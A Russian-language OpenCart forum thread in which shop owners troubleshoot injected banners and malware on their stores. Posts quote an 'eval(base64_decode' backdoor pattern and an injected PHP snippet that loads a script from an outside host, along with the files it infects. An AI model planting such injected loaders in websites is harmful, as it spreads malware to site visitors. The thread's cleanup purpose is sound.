ПОМОГИТЕ. Инородный банер и логотип на всех страницах магазина.

Тема в разделе "Общие вопросы", создана пользователем rkln, 5 июн 2015.

  1. rkln

    rkln Новичок

    Сообщения:
    5
    Симпатии:
    0
    Сегодня на всех страницах магазина:
    - под "футером" появился какойто банер;
    - в "шапке" мой логотип магазина заменен на чужой логотип и ссылку на какой то буржуйский хостинг
    вот ссылки на скрины
    https://yadi.sk/i/uPPRKkexh6E3M
    https://yadi.sk/i/bAJMaPSQh6EVc

    Помогите как исправить. Может кто то сталкивался... Спасибо.
     
  2. lavlan

    lavlan Пользователь

    Сообщения:
    89
    Симпатии:
    20
    Это кажется лишнее смотрите файл footer.tpl вашей темы...
    если вы этого сами не вставляли значит вирус....
    Код:
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head><title>
    </title>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    <title>NameBright - Coming Soon</title>
    <style type="text/css">
    body{background: #d8d8d8 url(https://www.namebrightstatic.com/images/bg.png) top repeat-x;}
    .pageBrowserError{min-height: 600px;}
    .container{margin: 0 auto;width: 922px;}
    .shadow_l{margin-left: 10px;}
    /*.shadow_r{margin-right: 10px;}*/
    .main_bg{background: #fff;}
    #header{padding: 0 2px;background: #fff;}
    #header.headerShort{height: 65px;}
    #header .header_in{padding-right: 14px;height: 145px;overflow: hidden;background: url(https://www.namebrightstatic.com/images/header_bg.png) top repeat-x;}
    #header .header_top{height: 65px;overflow:hidden}
    #logo {background: url(https://www.namebrightstatic.com/images/logo_off.gif) no-repeat;width: 225px;height: 57px;margin-left: 29px;float: left;color:#0038e6;text-indent: -9999px;}
    .pageBrowserError #content {padding: 0 0 0 8px;padding: 0 15px 15px 15px;overflow: hidden;background: #fff;}
    .errorBoard {background: url(https://www.namebrightstatic.com/images/error_board.png) no-repeat;width: 878px;height: 410px;padding: 4px;}
    .siteMaintenance {background: url(https://www.namebrightstatic.com/images/site_maintenance.png) no-repeat;width: 460px;height: 201px;margin: 81px auto 0 auto;padding-left: 140px;}
    .siteMaintenance h1 {font-size: 24px;line-height: 27px;text-align: left;padding-top: 65px;padding-bottom: 14px; clear:both;color:#FFF;}
    .siteMaintenance p {font: normal 16px Arial, Helvetica, sans-serif !important;color: #fff;}
    .siteMaintenance p a {color:#FFF;}
    </style>
    </head>
    <body>
    <form method="post" action="../../pages/Parking.aspx?404%3bhttp%3a%2f%2fmyopencart.net%3a80%2fgooglecode%2fapi%2fapi.php%3fserver=www.d-i-m.com.ua&amp;page=%2f" id="form1">
    <div class="aspNetHidden">
    <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTY1NDU2MTA1MmRkHmGRrqcaHzm/sMpLEGCwASQI7nExKJWvjDoN/TQys+Y=" />
    </div>
    <div class="aspNetHidden">
    <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="D985EE6E" />
    </div>
    <div>
    <div class="skin_default">
    <div class="skin_img">
    <div class="skin_bot">
    <div class="container pageBrowserError">
    <div style="padding-top:26px; background-color:#FFF;border-radius:10px 10px 0 0; margin:10px 0 -15px 10px;"></div>
    <div class="shadow_l" style="background:none;">
    <div class="shadow_r" style="background:none;">
    <div class="main_bg">
    <!-- HEADER -->
    <div id="header" class="headerShort">
    <div class="header_in">
    <div class="header_top">
    <a href="//www.namebright.com" id="logo" target="_parent" >NameBright.com - Next Generation Domain Registration</a>
    </div>
    </div>
    </div>
    <!-- CONTENT -->
    <div id="content">
    <div class="errorBoard">
    <div class="siteMaintenance" style="font-family:Tahoma">
    <h1>MyOpenCart.net<br /> is coming soon</h1>
    </div>
    </div>
    </div>
    </div>
    </div>
    <div style="padding-top:8px; background-color:#FFF; border-radius: 0 0 10px 10px; margin: 0 0 10px 0;"></div>
    </div>
    </div>
    </div>
    </div>
    </div>
    <!-- Start of StatCounter Code for Default Guide -->
    <script type="text/javascript">
    var sc_project = 9484561;
    var sc_invisible = 1;
    var sc_security = "b0cbab70";
    var sc_https = 1;
    var scJsHost = (("https:" == document.location.protocol) ?
    "https://secure." : "http://www.");
    document.write("<sc" + "ript type='text/javascript' src='" +
    scJsHost +
    "statcounter.com/counter/counter.js'></" + "script>");
    </script>
    <noscript><div class="statcounter"><a title="hits counter"
    href="http://statcounter.com/" target="_blank"><img
    class="statcounter"
    src="http://c.statcounter.com/9484561/0/b0cbab70/1/"
    alt="hits counter"></a></div></noscript>
    <!-- End of StatCounter Code for Default Guide -->
    </div>
    </form>
    </body>
    </html>
    
     
    Zlata Jesen нравится это.
  3. rkln

    rkln Новичок

    Сообщения:
    5
    Симпатии:
    0
    Мой футер по адресу catalog/view/theme/моя тема/template/common/footer.tpl выглядит следующим образом


    <div id="footer">
    <div id="textfooter1">
    <span style="text-transform: uppercase;">График работы:</span><br /><br />Пн-Пт: c 9:00 до 18:00<br />Прием заказов: круглосуточно<br />
    <br />+3(067)400-25-22
    <br />admin@d-i-m.com.ua
    </div>
    <?php if ($informations) { ?>
    <div class="column">
    <h3><?php echo $text_information; ?></h3>
    <ul>
    <?php foreach ($informations as $information) { ?>
    <li><a href="<?php echo $information['href']; ?>"><?php echo $information['title']; ?></a></li>
    <?php } ?>
    </ul>

    </div>
    <?php } ?>
    <div class="column">
    <h3><?php echo $text_service; ?></h3>
    <ul>
    <li><a href="<?php echo $contact; ?>"><?php echo $text_contact; ?></a></li>
    <li><a href="<?php echo $sitemap; ?>"><?php echo $text_sitemap; ?></a></li>
    </ul>

    </div>
    <div class="column">
    <h3><?php echo $text_extra; ?></h3>
    <ul>
    <li><a href="<?php echo $manufacturer; ?>"><?php echo $text_manufacturer; ?></a></li>
    <li><a href="<?php echo $special; ?>"><?php echo $text_special; ?></a></li>
    </ul>

    </div>
    <div class="column">
    <h3><?php echo $text_account; ?></h3>
    <ul>
    <li><a href="<?php echo $account; ?>"><?php echo $text_account; ?></a></li>
    <li><a href="<?php echo $wishlist; ?>"><?php echo $text_wishlist; ?></a></li>
    <!-- Yandex.Metrika informer -->
    <a href="https://metrika.yandex.ru/stat/?id=29884514&amp;from=informer"
    target="_blank" rel="nofollow"><img src="//bs.yandex.ru/informer/29884514/3_0_8D8D8DFF_6D6D6DFF_0_pageviews"
    style="width:88px; height:31px; border:0;" alt="Яндекс.Метрика" title="Яндекс.Метрика: данные за сегодня (просмотры, визиты и уникальные посетители)" onclick="try{Ya.Metrika.informer({i:this,id:29884514,lang:'ru'});return false}catch(e){}"/></a>
    <!-- /Yandex.Metrika informer -->

    <!-- Yandex.Metrika counter -->
    <script type="text/javascript">
    (function (d, w, c) {
    (w[c] = w[c] || []).push(function() {
    try {
    w.yaCounter29884514 = new Ya.Metrika({id:29884514,
    webvisor:true,
    clickmap:true,
    trackLinks:true,
    accurateTrackBounce:true});
    } catch(e) { }
    });

    var n = d.getElementsByTagName("script")[0],
    s = d.createElement("script"),
    f = function () { n.parentNode.insertBefore(s, n); };
    s.type = "text/javascript";
    s.async = true;
    s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js";

    if (w.opera == "[object Opera]") {
    d.addEventListener("DOMContentLoaded", f, false);
    } else { f(); }
    })(document, window, "yandex_metrika_callbacks");
    </script>
    <noscript><div><img src="//mc.yandex.ru/watch/29884514" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
    <!-- /Yandex.Metrika counter -->
    </ul>

    </div>
    <div id="powered"><?php echo $powered; ?></div>
    </div>
    <!--
    OpenCart is open source software and you are free to remove the powered by OpenCart if you want, but its generally accepted practise to make a small donation.
    Please donate via PayPal to donate@opencart.com
    //-->
    <!--
    OpenCart is open source software and you are free to remove the powered by OpenCart if you want, but its generally accepted practise to make a small donation.
    Please donate via PayPal to donate@opencart.com
    //-->
    </div><div class="footer-bg-bottom"></div>
    </body></html>


    .... или мы говорим о каком то ином файле Footer.tpl . Подскажите пожалуйста

    Я никаких скриптов НЕ ВТАВЛЯЛ. Если вирус, как избавиться и защититься в дальнейшем. Спасибо.
     
  4. lavlan

    lavlan Пользователь

    Сообщения:
    89
    Симпатии:
    20
    нет тогда скопируйте папку с темой к себе на комп и попробуйте найти что нибудь из того что я скопировал при просмотре Вашего сайта т.е. Просмотр кода страницы
    да и еще если это код то заключите его в тег [сode] Ваш код [/сode]
    да и еще вот этого кода у себя я тоже в файлах шаблона я тоже не нахожу...
    Код:
    <script>
    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
    (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
    m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
    })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
    ga('create', 'UA-63643098-1', 'auto');
    // Поиск картинок
    _gaq.push(['_addOrganic', 'images.yandex.ru', 'text', true]);
    // Поиск по блогам
    _gaq.push(['_addOrganic', 'blogsearch.google.ru', 'q', true]);
    _gaq.push(['_addOrganic', 'blogs.yandex.ru', 'text', true]);
    // Поисковики России
    _gaq.push(['_addOrganic', 'go.mail.ru', 'q']);
    _gaq.push(['_addOrganic', 'nova.rambler.ru', 'query']);
    _gaq.push(['_addOrganic', 'nigma.ru', 's']);
    _gaq.push(['_addOrganic', 'webalta.ru', 'q']);
    _gaq.push(['_addOrganic', 'aport.ru', 'r']);
    _gaq.push(['_addOrganic', 'poisk.ru', 'text']);
    _gaq.push(['_addOrganic', 'km.ru', 'sq']);
    _gaq.push(['_addOrganic', 'liveinternet.ru', 'q']);
    _gaq.push(['_addOrganic', 'quintura.ru', 'request']);
    _gaq.push(['_addOrganic', 'search.qip.ru', 'query']);
    _gaq.push(['_addOrganic', 'gde.ru', 'keywords']);
    _gaq.push(['_addOrganic', 'ru.yahoo.com', 'p']);
    // Поисковики Белоруссии
    _gaq.push(['_addOrganic', 'tut.by', 'query']);
    _gaq.push(['_addOrganic', 'all.by', 'query']);
    // Поисковики Украины
    _gaq.push(['_addOrganic', 'meta.ua', 'q']);
    _gaq.push(['_addOrganic', 'bigmir.net', 'z']);
    _gaq.push(['_addOrganic', 'i.ua', 'q']);
    // Товарные площадки России (поиск по товарам и прайсам)
    _gaq.push(['_addOrganic', 'market.yandex.ru', 'text', true]);
    _gaq.push(['_addOrganic', 'price.ru', 'query']);
    _gaq.push(['_addOrganic', 'tyndex.ru', 'pnam']);
    _gaq.push(['_addOrganic', 'torg.mail.ru', 'q']);
    _gaq.push(['_addOrganic', 'tiu.ru', 'search_term']);
    _gaq.push(['_addOrganic', 'tech2u.ru', 'text']);
    _gaq.push(['_addOrganic', 'goods.marketgid.com', 'query']);
    _gaq.push(['_addOrganic', 'poisk.ngs.ru', 'q']);
    _gaq.push(['_addOrganic', 'sravni.com', 'q']);
    _gaq.push(['_addOrganic', 'e-katalog.ru', 'search_']);
    // Товарные площадки Украины (поиск по товарам и
    прайсам)
    _gaq.push(['_addOrganic', 'market.meta.ua', 'q']);
    _gaq.push(['_addOrganic', 'sravni.ua', 'q']);
    _gaq.push(['_addOrganic', 'shop.bigmir.net', 'q']);
    _gaq.push(['_addOrganic', 'av.hotline.ua', 'q']);
    _gaq.push(['_addOrganic', 'bt.hotline.ua', 'q']);
    _gaq.push(['_addOrganic', 'dom.hotline.ua', 'q']);
    _gaq.push(['_addOrganic', 'sport.hotline.ua', 'q']);
    _gaq.push(['_addOrganic', 'auto.hotline.ua', 'q']);
    _gaq.push(['_addOrganic', 'hotline.ua', 'q']);
    _gaq.push(['_addOrganic', 'e-katalog.com.ua', 'search_']);
    _gaq.push(['_addOrganic', 'svitpokupok.com', 'q']);
    _gaq.push(['_addOrganic', 'search.topping.com.ua', 'query']);
    _gaq.push(['_addOrganic', 'searchcat.mytop-in.net', 'search']);
    _gaq.push(['_addOrganic', 'hit24.com.ua', 'sw']);
    _gaq.push(['_addOrganic', 'hotsale.ua', 'q']);
    _gaq.push(['_addOrganic', 'shop.i.ua', 'q']);
    _gaq.push(['_addOrganic', 'catalog.i.ua', 'q']);
    _gaq.push(['_addOrganic', 'price-list.in.ua', 'word']);
    _gaq.push(['_addOrganic', 'pay.ua', 'q']);
    _gaq.push(['_addOrganic', 'hotprice.ua', 's_text']);
    _gaq.push(['_addOrganic', 'ukr.net', 'search_query']);
    _gaq.push(['_addOrganic', 'search.ua', 'q']);
    _gaq.push(['_addOrganic', 'search.ukr.net', 'search_query']);
    _gaq.push(['_addOrganic', 'a.ua', 'query']);
    _gaq.push(['_addOrganic', 'online.ua', 'q']);
    ga('send', 'pageview');
    </script>
    
     
  5. rkln

    rkln Новичок

    Сообщения:
    5
    Симпатии:
    0
    Второй показанный Вами скрипт - это скрипт
    GoogleAnalytics. А первый попробую поискать. Спасибо.
     
  6. lavlan

    lavlan Пользователь

    Сообщения:
    89
    Симпатии:
    20
    Шаблон "Furnitures & Butik Shop" 1.5.5.1.1, 1.5.4, Maxyst Вы его покупали? или с просторов интернета?
    Если с просторов интернета, то Вы видите во что это выливается.
    Каждый труд должен быть оплачен...
    Это мое мнение и надеюсь что не только мое...
     
    Последнее редактирование модератором: 24 июл 2015
  7. rkln

    rkln Новичок

    Сообщения:
    5
    Симпатии:
    0
    С просторов, но скачал как бесплатный (с пометкой free). Никакой платы не требовалось. Неужели, где то есть моя вина.???
     
  8. lavlan

    lavlan Пользователь

    Сообщения:
    89
    Симпатии:
    20
    не знание ... не освобождает от ответственности.... :)
    ссылка где купить есть, там не написано что он Free,
    и еще не хорошо почти земляка обижать...
    950 руб это не дорого поверьте...
    на официальном сайте продаются шаблоны и дороже, причем чтобы получить этот шаблон из дефолтного надо только stylesheet.css поменять... проверял шаблонов 15 попадалось и стоили они от 25 -60$
     
    Последнее редактирование: 5 июн 2015
  9. rkln

    rkln Новичок

    Сообщения:
    5
    Симпатии:
    0
    Когда начинал затачивать мало что в коде понимал. Для меня весь текст казался некой несуразицей, до этого правил только файлы HTML, все менял долго и по крохам, но сейчас так много всего сделано, что готов и заплатить т.к. все делалось без злого умысла (хотелось попробовать, но и в конец концов что-то получилось).
     
  10. lavlan

    lavlan Пользователь

    Сообщения:
    89
    Симпатии:
    20
    Вот этот адрес как раз присутствует в приведенном мной коде вверху, кто то деньги зарабатывает ...
     
  11. lavlan

    lavlan Пользователь

    Сообщения:
    89
    Симпатии:
    20
    А чем .tpl отличается от .html - в нем присутствуют php переменные а в остальном все тоже самое...
    если я не прав - поправьте
     
  12. Ален

    Ален Эксперт

    Сообщения:
    2.056
    Симпатии:
    640
    Не пользоваться варезом. Покупать модуль и темы, даже если кажется что дорого!!!

    Теперь один выход.
    1. Установка движка по новой, желательно на новый уже хост.
    2. Проверка компа на вирусы.
    3. Импорт базы от магазина.
    4. Покупка всех модулей и шаблона.
    5. Радуемся и делаем резервные копии периодически!!
     
    Zlata Jesen и lavlan нравится это.
  13. Ivan9595

    Ivan9595 Новичок

    Сообщения:
    3
    Симпатии:
    0

    Здравствуйте!

    Тоже появился точно такой же баннер в футере (в том числе в админке), и этот же логотип.
    Есть какие-то мысли по поводу решения проблемы?
    Проверил уже кучу файлов - никакого постороннего кода нигде не нахожу(((
    Может быть Вы решили эту проблему?
     
  14. lavlan

    lavlan Пользователь

    Сообщения:
    89
    Симпатии:
    20
    Мысли есть - ВАРЕЗ!!! вирусы вирусы вирусы ... не используйте платные темы/модули бесплатно... они не так уж и дорого стоят...,
    а если используете, то используйте с головой, но лучше не используйте...
    Это только мое мнение...
     
    Последнее редактирование: 22 июн 2015
    Romans нравится это.
  15. Ivan9595

    Ivan9595 Новичок

    Сообщения:
    3
    Симпатии:
    0
    Очень свежая мысль, спасибо конечно!
    Есть у кого-то идеи как решить уже возникшую проблему?
     
  16. lavlan

    lavlan Пользователь

    Сообщения:
    89
    Симпатии:
    20
    адрес сайта...
    ищете в файлах .tpl код приведенный в этом сообщении
    опаньки немного ошибся в этом сообщении
     
    Последнее редактирование: 22 июн 2015
  17. Ivan9595

    Ivan9595 Новичок

    Сообщения:
    3
    Симпатии:
    0
    Проблема решена.
    Кто столкнётся с этим - ищите строку, начинающуюся с $ouput=eval(base64_decode (в файле response.php по пути /system/library/).
    Всю строку удаляете, вместо неё ставите echo $ouput;

    Файл сохраняете, загружаете на хостинг.
    Проверяете, радуетесь)

    А насчёт варезных тем/модулей - с этим согласен, труд должен быть оплачен!
     
  18. Romans

    Romans Administrator Команда форума

    Сообщения:
    1.434
    Симпатии:
    780
    радоваться рано!! Загруженные модули с вареза могут не содержать похожих строчек, но выполняют исправно функции логирования действий. Могут выдавать пользователям свои данные, воровать их данные, а так же записывать ваши данные от админке итд.
    Поэтому, рановато.....
     
    lavlan нравится это.
  19. lavlan

    lavlan Пользователь

    Сообщения:
    89
    Симпатии:
    20
    если уж и использовать ВАРЕЗ, то надо все файлы проверить на предмет "плохого кода" (мальчиш плохиш такой), а это поверьте того не стоит. И будет как в той рекламе про "сеалекс" (задолбали они уже этими рекламами). Как известно вдруг - ни чего не бывает...
    З.Ы. Это только мое мнение...
     
    Последнее редактирование: 24 июн 2015
  20. RoS

    RoS Специалист

    Сообщения:
    227
    Симпатии:
    220
    Здравствуйте.
    В последнее время на сайтах под версией 1.5.4.1 - 1.5.5.1, появилась болячка в виде вставки примерно такого кода:
    Код:
    #4e0199#
    if(empty($cidg)) {
    $cidg = "<script type=\"text/javascript\" src=\"http://autoshed.ru/templates/atomic/z9jqqbt7.php?id=8635575\"></script>";
    echo $cidg;
    }
    #/4e0199#
    При попытке зайти узнать что за сайт, появляется сообщение что сайт содержит вредоносный код

    Прописывается в:
    • /index.php
    • /config,php
    • /vqmod/install/index.php
    • /vqmod/install/ugrsr.class.php
    • /vqmod/vqmod.php
    на одном из сайтах вписалась в /js/jquery-1.4.2.min.js (скрипт не подключен к системе)
    Причем в каждом сайте, ссылка, переменная и цифры внутри #.....# отличаются.

    После пару дней как этот код вставляется, при заходе на сайт, браузер или гугл выводит сообщение что сайт содержит вредоносный код и может навредить компьютеру. Если сообщения нету, то выявить можно поломкой верстки. Нагрузку на сервер не создает.

    Думал что модули с вирусом на последних сайтах поставил......
    Но есть несколько сайтов которые работали от года без проблем - до этих дней.
    У них нет одинаковых модулей за которые можно было бы зацепиться. Сейчас и они подверглись болячке. Права на папки и файлы выставлены.
    Смена паролей FTP, БД не дает результата. После того как почищу сайты и админ сменит пароли. В протяжении нескольких дней на сервере попыток атаки не наблюдается, но сайты снова оказываются заражены. Такое чувство будто кому-то сливаются пароли и они через фтп заходят и портят сайты.
    Вирусов на компе нету!
    Может у кого была подобная ситуация или идеи есть из-за чего это может быть?